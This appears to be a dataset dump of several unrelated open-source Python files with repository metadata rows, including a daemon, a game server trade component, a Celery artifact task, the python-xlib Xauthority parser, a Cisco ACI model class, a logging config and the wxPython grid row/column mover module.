来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/maximum-depth-of-binary-tree
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
'''
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
79800080c4d9f0483f339e63026999badf2cd752 | 4522fc52bc43654aadd30421a75bae00a09044f0 | /alfa/diannad.py | f52594100e43207f34f304fe117f59a727bc3de3 | [] | no_license | qesoalpe/anelys | 1edb8201aa80fedf0316db973da3a58b67070fca | cfccaa1bf5175827794da451a9408a26cd97599d | refs/heads/master | 2020-04-07T22:39:35.344954 | 2018-11-25T05:23:21 | 2018-11-25T05:23:21 | 158,779,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | from sarah.acp_bson import Recipient
from base64 import b64decode
import json
ff = open('dianna_file', 'rb')
config = json.loads(b64decode(ff.read()).decode())
ff.close()
def handle_request(msg):
if 'request_type' in msg:
if msg['request_type'] == 'get':
if msg['get'] == 'dianna/local_device':
return {'local_device': config['local_device']}
dict_handle_msg = dict()
dict_handle_msg['request'] = handle_request
def read_msg(msg):
if 'type_message' in msg and msg['type_message'] in dict_handle_msg:
return dict_handle_msg[msg['type_message']](msg)
if __name__ == '__main__':
print("I'm citlali daemon.")
recipient = Recipient()
recipient.prepare('citlali', read_msg)
recipient.begin_receive_forever()
| [
"[email protected]"
] | |
5798d06030285a366239004b9efbbf2e57eedf93 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /spacecomponents/server/components/itemtrader.py | d137971475932934dac6aa414f5db1d9685da1b9 | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,402 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\spacecomponents\server\components\itemtrader.py
from spacecomponents.common.components.component import Component
from spacecomponents.common.componentregistry import ExportCall
import evetypes
class ItemTrader(Component):
def __init__(self, itemTraderItemId, typeId, attributes, componentRegistry):
Component.__init__(self, itemTraderItemId, typeId, attributes, componentRegistry)
self.SubscribeToMessage('OnAddedToSpace', self.OnAddedToSpace)
def OnAddedToSpace(self, ballpark, spaceComponentDb):
self.tradeProcessor = TradeProcessor(ballpark, ballpark.inventory2, ballpark.inventoryMgr, self.itemID, self.attributes.inputItems, self.attributes.outputItems, self.attributes.interactionRange)
@ExportCall
def ProcessTrade(self, session):
return self.tradeProcessor.ProcessTrade(session.shipid, session.charid)
class TradeProcessor(object):
def __init__(self, ballpark, inventory2, inventoryMgr, itemTraderItemId, inputItems, outputItems, interactionRange):
self.ballpark = ballpark
self.inventory2 = inventory2
self.inventoryMgr = inventoryMgr
self.itemTraderItemId = itemTraderItemId
self.inputItems = inputItems
self.outputItems = outputItems
self.interactionRange = interactionRange
self.requiredCapacity = self.GetCapacityForItems(outputItems) - self.GetCapacityForItems(inputItems)
def ProcessTrade(self, shipId, ownerId):
with self.inventory2.LockedItemAndSubItems(shipId):
self.CheckDistance(shipId)
ship = self.inventoryMgr.GetInventoryFromIdEx(shipId, -1)
self.CheckCargoCapacity(ship)
cargoItems = ship.List(const.flagCargo)
itemsForRemoval = self._GetItemsForTrade(cargoItems)
if itemsForRemoval:
self._TakeItems(shipId, itemsForRemoval)
self._GiveItems(shipId, ownerId)
return True
return False
def _GetItemsForTrade(self, cargoItems):
itemsForTrade = {}
for requiredTypeId, requiredQuantity in self.inputItems.iteritems():
quantityLeft = self._GetItemsForTradeFromCargo(cargoItems, itemsForTrade, requiredTypeId, requiredQuantity)
if quantityLeft != 0:
return {}
return itemsForTrade
def _GetItemsForTradeFromCargo(self, cargoItems, itemsForTrade, requiredTypeId, requiredQuantity):
quantityLeft = requiredQuantity
for item in cargoItems:
if item.typeID == requiredTypeId:
quantity = min(quantityLeft, item.quantity)
itemsForTrade[item.itemID] = quantity
quantityLeft -= quantity
if quantityLeft == 0:
break
return quantityLeft
def _TakeItems(self, shipId, itemsForRemoval):
for itemId, quantityForRemoval in itemsForRemoval.iteritems():
self.inventory2.MoveItem(itemId, shipId, const.locationJunkyard, qty=quantityForRemoval)
def _GiveItems(self, shipId, ownerId):
for typeId, quantityForAdd in self.outputItems.iteritems():
self.inventory2.AddItem2(typeId, ownerId, shipId, qty=quantityForAdd, flag=const.flagCargo)
def GetCapacityForItems(self, items):
capacity = 0
for typeId, quantity in items.iteritems():
typeVolume = evetypes.GetVolume(typeId)
capacity += quantity * typeVolume
return capacity
def CheckCargoCapacity(self, ship):
shipCapacity = ship.GetCapacity(flag=const.flagCargo)
availableCapacity = shipCapacity.capacity - shipCapacity.used
if availableCapacity < self.requiredCapacity:
raise UserError('NotEnoughCargoSpace', {'available': shipCapacity.capacity - shipCapacity.used,
'volume': self.requiredCapacity})
def CheckDistance(self, shipId):
actualDistance = self.ballpark.GetSurfaceDist(self.itemTraderItemId, shipId)
if actualDistance > self.interactionRange:
typeName = evetypes.GetName(self.inventory2.GetItem(self.itemTraderItemId).typeID)
raise UserError('TargetNotWithinRange', {'targetGroupName': typeName,
'desiredRange': self.interactionRange,
'actualDistance': actualDistance})
| [
"[email protected]"
] | |
b018c86a7c6c80f8fa48f8ac5dcca77ac0fc80bc | d8c50195fe04a09bd98e12f0b18a84dbe4a3dfe2 | /zeus/tasks/process_artifact.py | a16482e42a4078a95b72babb1012eb62ace1e806 | [
"Apache-2.0"
] | permissive | keegancsmith/zeus | 44eeac0e9c99635f21bfa7ec744c84be7b40525e | e7bfe3db564ad1bbf449d8197f7d663fe41dd60a | refs/heads/master | 2021-09-04T04:34:47.747175 | 2018-01-12T17:24:11 | 2018-01-12T21:55:31 | 117,591,379 | 0 | 0 | null | 2018-01-15T20:19:57 | 2018-01-15T20:19:57 | null | UTF-8 | Python | false | false | 2,120 | py | from flask import current_app
from zeus import auth
from zeus.artifacts import manager as default_manager
from zeus.config import celery, db
from zeus.constants import Result
from zeus.models import Artifact, Job, Status
from zeus.utils import timezone
from .aggregate_job_stats import aggregate_build_stats_for_job
@celery.task(max_retries=None, autoretry_for=(Exception,), acks_late=True)
def process_artifact(artifact_id, manager=None, force=False, **kwargs):
artifact = Artifact.query.unrestricted_unsafe().get(artifact_id)
if artifact is None:
current_app.logger.error('Artifact %s not found', artifact_id)
return
if artifact.status == Status.finished and not force:
current_app.logger.info(
'Skipping artifact processing (%s) - already marked as finished', artifact_id)
return
artifact.status = Status.in_progress
artifact.date_started = timezone.now()
db.session.add(artifact)
db.session.flush()
auth.set_current_tenant(auth.Tenant(
repository_ids=[artifact.repository_id]))
job = Job.query.get(artifact.job_id)
if job.result == Result.aborted:
current_app.logger.info(
'Skipping artifact processing (%s) - Job aborted', artifact_id)
artifact.status = Status.finished
db.session.add(artifact)
db.session.commit()
return
if artifact.file:
if manager is None:
manager = default_manager
try:
with db.session.begin_nested():
manager.process(artifact)
except Exception:
current_app.logger.exception(
'Unrecoverable exception processing artifact %s: %s', artifact.job_id, artifact
)
else:
current_app.logger.info(
'Skipping artifact processing (%s) due to missing file', artifact_id)
artifact.status = Status.finished
artifact.date_finished = timezone.now()
db.session.add(artifact)
db.session.commit()
# we always aggregate results to avoid locking here
aggregate_build_stats_for_job.delay(job_id=job.id)
| [
"[email protected]"
] | |
4e71953ea5d17920c540d29e944877d704f20cc5 | 4ee4c2cafad449dd60032630bdd249e63d70b5ac | /plugins/xevents/Xlib/xauth.py | 4755b353f1bc01bc186ea50603860a9c1df9ddec | [
"MIT",
"GPL-2.0-only"
] | permissive | rrojasPy/TurtleBots.activity | 4c44ed90b1aadbd0788cdb091fc647deac28d8e8 | c18e64cc817b2bd8d8cd80a538ff703f580bbe42 | refs/heads/master | 2022-10-20T20:46:27.304452 | 2020-06-17T15:57:11 | 2020-06-17T15:57:11 | 273,014,877 | 0 | 1 | MIT | 2020-06-17T15:57:12 | 2020-06-17T15:44:15 | null | UTF-8 | Python | false | false | 4,168 | py | # $Id: xauth.py,v 1.5 2007/06/10 14:11:58 mggrant Exp $
#
# Xlib.xauth -- ~/.Xauthority access
#
# Copyright (C) 2000 Peter Liljenberg <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
import struct
from Xlib import X, error
FamilyInternet = X.FamilyInternet
FamilyDECnet = X.FamilyDECnet
FamilyChaos = X.FamilyChaos
FamilyLocal = 256
class Xauthority:
def __init__(self, filename = None):
if filename is None:
filename = os.environ.get('XAUTHORITY')
if filename is None:
try:
filename = os.path.join(os.environ['HOME'], '.Xauthority')
except KeyError:
raise error.XauthError(
'$HOME not set, cannot find ~/.Xauthority')
try:
raw = open(filename, 'rb').read()
except IOError, err:
raise error.XauthError('~/.Xauthority: %s' % err)
self.entries = []
# entry format (all shorts in big-endian)
# short family;
# short addrlen;
# char addr[addrlen];
# short numlen;
# char num[numlen];
# short namelen;
# char name[namelen];
# short datalen;
# char data[datalen];
n = 0
try:
while n < len(raw):
family, = struct.unpack('>H', raw[n:n+2])
n = n + 2
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
addr = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
num = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
name = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
data = raw[n - length : n]
if len(data) != length:
break
self.entries.append((family, addr, num, name, data))
except struct.error, e:
print "Xlib.xauth: warning, failed to parse part of xauthority file (%s), aborting all further parsing" % filename
#pass
if len(self.entries) == 0:
print "Xlib.xauth: warning, no xauthority details available"
# raise an error? this should get partially caught by the XNoAuthError in get_best_auth..
def __len__(self):
return len(self.entries)
def __getitem__(self, i):
return self.entries[i]
def get_best_auth(self, family, address, dispno,
types = ( "MIT-MAGIC-COOKIE-1", )):
"""Find an authentication entry matching FAMILY, ADDRESS and
DISPNO.
The name of the auth scheme must match one of the names in
TYPES. If several entries match, the first scheme in TYPES
will be choosen.
If an entry is found, the tuple (name, data) is returned,
otherwise XNoAuthError is raised.
"""
num = str(dispno)
matches = {}
for efam, eaddr, enum, ename, edata in self.entries:
if efam == family and eaddr == address and num == enum:
matches[ename] = edata
for t in types:
try:
return (t, matches[t])
except KeyError:
pass
raise error.XNoAuthError((family, address, dispno))
| [
"[email protected]"
] | |
3db1c085e8a1c20d8814e3cf539505d24c6036e6 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/reln/targetdeleteargs.py | 1ed2258f3814fe86e5b5b2306d6d6bd97c64e2a3 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,573 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class TargetDeleteArgs(Mo):
"""
"""
meta = ClassMeta("cobra.model.reln.TargetDeleteArgs")
meta.moClassName = "relnTargetDeleteArgs"
meta.rnFormat = "tdel-[%(resolverDn)s]"
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.top.Root")
meta.rnPrefixes = [
('tdel-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "resolverDn", "resolverDn", 179, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("resolverDn", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "targetClass", "targetClass", 181, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("targetClass", prop)
prop = PropMeta("str", "targetDn", "targetDn", 180, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("targetDn", prop)
prop = PropMeta("str", "targetRn", "targetRn", 182, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("targetRn", prop)
meta.namingProps.append(getattr(meta.props, "resolverDn"))
getattr(meta.props, "resolverDn").needDelimiter = True
def __init__(self, parentMoOrDn, resolverDn, markDirty=True, **creationProps):
namingVals = [resolverDn]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
0eee2867d2a4f3aca7a06bb5468124d94ef182fe | 1e263d605d4eaf0fd20f90dd2aa4174574e3ebce | /components/ally-utilities/__setup__/ally_utilities/logging.py | b8a479b38eb8e2357cf75e837ffe1b544a61d068 | [] | no_license | galiminus/my_liveblog | 698f67174753ff30f8c9590935d6562a79ad2cbf | 550aa1d0a58fc30aa9faccbfd24c79a0ceb83352 | refs/heads/master | 2021-05-26T20:03:13.506295 | 2013-04-23T09:57:53 | 2013-04-23T09:57:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | '''
Created on Nov 7, 2012
@package: ally utilities
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides the logging configurations to be used for the application.
'''
from ally.container import ioc
# --------------------------------------------------------------------
@ioc.config
def format():
'''
The format to use for the logging messages more details can be found at "http://docs.python.org/3/library/logging.html"
in chapter "16.7.6. LogRecord attributes. Example:
"%(asctime)s %(levelname)s (%(threadName)s %(module)s.%(funcName)s %(lineno)d): %(message)s"
'''
return '%(module)s.%(funcName)s %(lineno)d: %(message)s'
@ioc.config
def debug_for():
'''
The list of packages or module patterns to provide debugging for, attention this is available only if the application
is not run with -O or -OO option
'''
return []
@ioc.config
def info_for():
'''The list of packages or module patterns to provide info for'''
return ['__deploy__', '__setup__']
@ioc.config
def warning_for():
'''The list of packages or module patterns to provide warnings for'''
return ['ally']
@ioc.config
def log_file():
''' The name of the log file '''
return 'app.log'
| [
"[email protected]"
] | |
aab67d9860ed9c71a79cb65ad39d549bc6174a0b | dca653bb975528bd1b8ab2547f6ef4f48e15b7b7 | /tags/wxPy-2.8.10.1/wxPython/wx/lib/gridmovers.py | f007fb1aea41c6a7e5279985ce8feed6a3d70262 | [] | no_license | czxxjtu/wxPython-1 | 51ca2f62ff6c01722e50742d1813f4be378c0517 | 6a7473c258ea4105f44e31d140ea5c0ae6bc46d8 | refs/heads/master | 2021-01-15T12:09:59.328778 | 2015-01-05T20:55:10 | 2015-01-05T20:55:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,861 | py | #----------------------------------------------------------------------------
# Name: GridColMover.py
# Purpose: Grid Column Mover Extension
#
# Author: Gerrit van Dyk (email: [email protected])
#
# Version 0.1
# Date: Nov 19, 2002
# RCS-ID: $Id$
# Licence: wxWindows license
#----------------------------------------------------------------------------
# 12/07/2003 - Jeff Grimmett ([email protected])
#
# o 2.5 Compatability changes
#
# 12/18/2003 - Jeff Grimmett ([email protected])
#
# o wxGridColMoveEvent -> GridColMoveEvent
# o wxGridRowMoveEvent -> GridRowMoveEvent
# o wxGridColMover -> GridColMover
# o wxGridRowMover -> GridRowMover
#
import wx
import wx.grid
#----------------------------------------------------------------------------
# event class and macros
#
# New style 12/7/03
#
wxEVT_COMMAND_GRID_COL_MOVE = wx.NewEventType()
wxEVT_COMMAND_GRID_ROW_MOVE = wx.NewEventType()
EVT_GRID_COL_MOVE = wx.PyEventBinder(wxEVT_COMMAND_GRID_COL_MOVE, 1)
EVT_GRID_ROW_MOVE = wx.PyEventBinder(wxEVT_COMMAND_GRID_ROW_MOVE, 1)
#----------------------------------------------------------------------------
class GridColMoveEvent(wx.PyCommandEvent):
def __init__(self, id, dCol, bCol):
wx.PyCommandEvent.__init__(self, id = id)
self.SetEventType(wxEVT_COMMAND_GRID_COL_MOVE)
self.moveColumn = dCol
self.beforeColumn = bCol
def GetMoveColumn(self):
return self.moveColumn
def GetBeforeColumn(self):
return self.beforeColumn
class GridRowMoveEvent(wx.PyCommandEvent):
def __init__(self, id, dRow, bRow):
wx.PyCommandEvent.__init__(self,id = id)
self.SetEventType(wxEVT_COMMAND_GRID_ROW_MOVE)
self.moveRow = dRow
self.beforeRow = bRow
def GetMoveRow(self):
return self.moveRow
def GetBeforeRow(self):
return self.beforeRow
#----------------------------------------------------------------------------
# graft new methods into the wxGrid class
def _ColToRect(self,col):
if self.GetNumberRows() > 0:
rect = self.CellToRect(0,col)
else:
rect = wx.Rect()
rect.height = self.GetColLabelSize()
rect.width = self.GetColSize(col)
for cCol in range(0,col):
rect.x += self.GetColSize(cCol)
rect.y = self.GetGridColLabelWindow().GetPosition()[1]
return rect
wx.grid.Grid.ColToRect = _ColToRect
def _RowToRect(self,row):
if self.GetNumberCols() > 0:
rect = self.CellToRect(row,0)
else:
rect = wx.Rect()
rect.width = self.GetRowLabelSize()
rect.height = self.GetRowSize(row)
for cRow in range(0,row):
rect.y += self.GetRowSize(cRow)
rect.x = self.GetGridRowLabelWindow().GetPosition()[0]
return rect
wx.grid.Grid.RowToRect = _RowToRect
#----------------------------------------------------------------------------
class ColDragWindow(wx.Window):
def __init__(self,parent,image,dragCol):
wx.Window.__init__(self,parent,-1, style=wx.SIMPLE_BORDER)
self.image = image
self.SetSize((self.image.GetWidth(),self.image.GetHeight()))
self.ux = parent.GetScrollPixelsPerUnit()[0]
self.moveColumn = dragCol
self.Bind(wx.EVT_PAINT, self.OnPaint)
def DisplayAt(self,pos,y):
x = self.GetPositionTuple()[0]
if x == pos:
self.Refresh() # Need to display insertion point
else:
self.MoveXY(pos,y)
def GetMoveColumn(self):
return self.moveColumn
def _GetInsertionInfo(self):
parent = self.GetParent()
sx = parent.GetViewStart()[0] * self.ux
sx -= parent.GetRowLabelSize()
x = self.GetPosition()[0]
w = self.GetSize()[0]
sCol = parent.XToCol(x + sx)
eCol = parent.XToCol(x + w + sx)
iPos = xPos = xCol = 99999
centerPos = x + sx + (w / 2)
for col in range(sCol,eCol + 1):
cx = parent.ColToRect(col)[0]
if abs(cx - centerPos) < iPos:
iPos = abs(cx - centerPos)
xCol = col
xPos = cx
if xCol < 0 or xCol > parent.GetNumberCols():
xCol = parent.GetNumberCols()
return (xPos - sx - x,xCol)
def GetInsertionColumn(self):
return self._GetInsertionInfo()[1]
def GetInsertionPos(self):
return self._GetInsertionInfo()[0]
def OnPaint(self,evt):
dc = wx.PaintDC(self)
w,h = self.GetSize()
dc.DrawBitmap(self.image, 0,0)
dc.SetPen(wx.Pen(wx.BLACK,1,wx.SOLID))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(0,0, w,h)
iPos = self.GetInsertionPos()
dc.DrawLine(iPos,h - 10, iPos,h)
class RowDragWindow(wx.Window):
def __init__(self,parent,image,dragRow):
wx.Window.__init__(self,parent,-1, style=wx.SIMPLE_BORDER)
self.image = image
self.SetSize((self.image.GetWidth(),self.image.GetHeight()))
self.uy = parent.GetScrollPixelsPerUnit()[1]
self.moveRow = dragRow
self.Bind(wx.EVT_PAINT, self.OnPaint)
def DisplayAt(self,x,pos):
y = self.GetPosition()[1]
if y == pos:
self.Refresh() # Need to display insertion point
else:
self.MoveXY(x,pos)
def GetMoveRow(self):
return self.moveRow
def _GetInsertionInfo(self):
parent = self.GetParent()
sy = parent.GetViewStart()[1] * self.uy
sy -= parent.GetColLabelSize()
y = self.GetPosition()[1]
h = self.GetSize()[1]
sRow = parent.YToRow(y + sy)
eRow = parent.YToRow(y + h + sy)
iPos = yPos = yRow = 99999
centerPos = y + sy + (h / 2)
for row in range(sRow,eRow + 1):
cy = parent.RowToRect(row)[1]
if abs(cy - centerPos) < iPos:
iPos = abs(cy - centerPos)
yRow = row
yPos = cy
if yRow < 0 or yRow > parent.GetNumberRows():
yRow = parent.GetNumberRows()
return (yPos - sy - y,yRow)
def GetInsertionRow(self):
return self._GetInsertionInfo()[1]
def GetInsertionPos(self):
return self._GetInsertionInfo()[0]
def OnPaint(self,evt):
dc = wx.PaintDC(self)
w,h = self.GetSize()
dc.DrawBitmap(self.image, 0,0)
dc.SetPen(wx.Pen(wx.BLACK,1,wx.SOLID))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(0,0, w,h)
iPos = self.GetInsertionPos()
dc.DrawLine(w - 10,iPos, w,iPos)
#----------------------------------------------------------------------------
class GridColMover(wx.EvtHandler):
def __init__(self,grid):
wx.EvtHandler.__init__(self)
self.grid = grid
self.lwin = grid.GetGridColLabelWindow()
self.lwin.PushEventHandler(self)
self.colWin = None
self.ux = self.grid.GetScrollPixelsPerUnit()[0]
self.startX = -10
self.cellX = 0
self.didMove = False
self.isDragging = False
self.Bind(wx.EVT_MOTION, self.OnMouseMove)
self.Bind(wx.EVT_LEFT_DOWN, self.OnPress)
self.Bind(wx.EVT_LEFT_UP, self.OnRelease)
def OnMouseMove(self,evt):
if not self.isDragging:
evt.Skip()
else:
_rlSize = self.grid.GetRowLabelSize()
if abs(self.startX - evt.m_x) >= 3 \
and abs(evt.m_x - self.lastX) >= 3:
self.lastX = evt.m_x
self.didMove = True
sx,y = self.grid.GetViewStart()
w,h = self.lwin.GetClientSize()
x = sx * self.ux
if (evt.m_x + x) < x:
x = evt.m_x + x
elif evt.m_x > w:
x += evt.m_x - w
if x < 1: x = 0
else: x /= self.ux
if x != sx:
if wx.Platform == '__WXMSW__':
self.colWin.Show(False)
self.grid.Scroll(x,y)
x,y = self.lwin.ClientToScreenXY(evt.m_x,0)
x,y = self.grid.ScreenToClientXY(x,y)
if not self.colWin.IsShown():
self.colWin.Show(True)
px = x - self.cellX
if px < 0 + _rlSize: px = 0 + _rlSize
if px > w - self.colWin.GetSize()[0] + _rlSize:
px = w - self.colWin.GetSize()[0] + _rlSize
self.colWin.DisplayAt(px,y)
return
def OnPress(self,evt):
self.startX = self.lastX = evt.m_x
_rlSize = self.grid.GetRowLabelSize()
sx = self.grid.GetViewStart()[0] * self.ux
sx -= _rlSize
px,py = self.lwin.ClientToScreenXY(evt.m_x,evt.m_y)
px,py = self.grid.ScreenToClientXY(px,py)
if self.grid.XToEdgeOfCol(px + sx) != wx.NOT_FOUND:
evt.Skip()
return
self.isDragging = True
self.didMove = False
col = self.grid.XToCol(px + sx)
rect = self.grid.ColToRect(col)
self.cellX = px + sx - rect.x
size = self.lwin.GetSize()
rect.y = 0
rect.x -= sx + _rlSize
rect.height = size[1]
colImg = self._CaptureImage(rect)
self.colWin = ColDragWindow(self.grid,colImg,col)
self.colWin.Show(False)
self.lwin.CaptureMouse()
evt.Skip()
def OnRelease(self,evt):
if self.isDragging:
self.lwin.ReleaseMouse()
self.colWin.Show(False)
self.isDragging = False
if not self.didMove:
px = self.lwin.ClientToScreenXY(self.startX,0)[0]
px = self.grid.ScreenToClientXY(px,0)[0]
sx = self.grid.GetViewStart()[0] * self.ux
sx -= self.grid.GetRowLabelSize()
col = self.grid.XToCol(px+sx)
if col != wx.NOT_FOUND:
self.grid.SelectCol(col,evt.m_controlDown)
return
else:
bCol = self.colWin.GetInsertionColumn()
dCol = self.colWin.GetMoveColumn()
wx.PostEvent(self,
GridColMoveEvent(self.grid.GetId(), dCol, bCol))
self.colWin.Destroy()
evt.Skip()
def _CaptureImage(self,rect):
bmp = wx.EmptyBitmap(rect.width,rect.height)
memdc = wx.MemoryDC()
memdc.SelectObject(bmp)
dc = wx.WindowDC(self.lwin)
memdc.Blit(0,0, rect.width, rect.height, dc, rect.x, rect.y)
memdc.SelectObject(wx.NullBitmap)
return bmp
class GridRowMover(wx.EvtHandler):
def __init__(self,grid):
wx.EvtHandler.__init__(self)
self.grid = grid
self.lwin = grid.GetGridRowLabelWindow()
self.lwin.PushEventHandler(self)
self.rowWin = None
self.uy = self.grid.GetScrollPixelsPerUnit()[1]
self.startY = -10
self.cellY = 0
self.didMove = False
self.isDragging = False
self.Bind(wx.EVT_MOTION, self.OnMouseMove)
self.Bind(wx.EVT_LEFT_DOWN, self.OnPress)
self.Bind(wx.EVT_LEFT_UP, self.OnRelease)
def OnMouseMove(self,evt):
if not self.isDragging:
evt.Skip()
else:
_clSize = self.grid.GetColLabelSize()
if abs(self.startY - evt.m_y) >= 3 \
and abs(evt.m_y - self.lastY) >= 3:
self.lastY = evt.m_y
self.didMove = True
x,sy = self.grid.GetViewStart()
w,h = self.lwin.GetClientSizeTuple()
y = sy * self.uy
if (evt.m_y + y) < y:
y = evt.m_y + y
elif evt.m_y > h:
y += evt.m_y - h
if y < 1:
y = 0
else:
y /= self.uy
if y != sy:
if wx.Platform == '__WXMSW__':
self.rowWin.Show(False)
self.grid.Scroll(x,y)
x,y = self.lwin.ClientToScreenXY(0,evt.m_y)
x,y = self.grid.ScreenToClientXY(x,y)
if not self.rowWin.IsShown():
self.rowWin.Show(True)
py = y - self.cellY
if py < 0 + _clSize:
py = 0 + _clSize
if py > h - self.rowWin.GetSize()[1] + _clSize:
py = h - self.rowWin.GetSize()[1] + _clSize
self.rowWin.DisplayAt(x,py)
return
def OnPress(self,evt):
self.startY = self.lastY = evt.m_y
_clSize = self.grid.GetColLabelSize()
sy = self.grid.GetViewStart()[1] * self.uy
sy -= _clSize
px,py = self.lwin.ClientToScreenXY(evt.m_x,evt.m_y)
px,py = self.grid.ScreenToClientXY(px,py)
if self.grid.YToEdgeOfRow(py + sy) != wx.NOT_FOUND:
evt.Skip()
return
self.isDragging = True
self.didMove = False
row = self.grid.YToRow(py + sy)
rect = self.grid.RowToRect(row)
self.cellY = py + sy - rect.y
size = self.lwin.GetSize()
rect.x = 0
rect.y -= sy + _clSize
rect.width = size[0]
rowImg = self._CaptureImage(rect)
self.rowWin = RowDragWindow(self.grid,rowImg,row)
self.rowWin.Show(False)
self.lwin.CaptureMouse()
evt.Skip()
def OnRelease(self,evt):
if self.isDragging:
self.lwin.ReleaseMouse()
self.rowWin.Show(False)
self.isDragging = False
if not self.didMove:
py = self.lwin.ClientToScreenXY(0,self.startY)[1]
py = self.grid.ScreenToClientXY(0,py)[1]
sy = self.grid.GetViewStart()[1] * self.uy
sy -= self.grid.GetColLabelSize()
row = self.grid.YToRow(py + sy)
if row != wx.NOT_FOUND:
self.grid.SelectRow(row,evt.m_controlDown)
return
else:
bRow = self.rowWin.GetInsertionRow()
dRow = self.rowWin.GetMoveRow()
wx.PostEvent(self,
GridRowMoveEvent(self.grid.GetId(), dRow, bRow))
self.rowWin.Destroy()
evt.Skip()
def _CaptureImage(self,rect):
bmp = wx.EmptyBitmap(rect.width,rect.height)
memdc = wx.MemoryDC()
memdc.SelectObject(bmp)
dc = wx.WindowDC(self.lwin)
memdc.Blit(0,0, rect.width, rect.height, dc, rect.x, rect.y)
memdc.SelectObject(wx.NullBitmap)
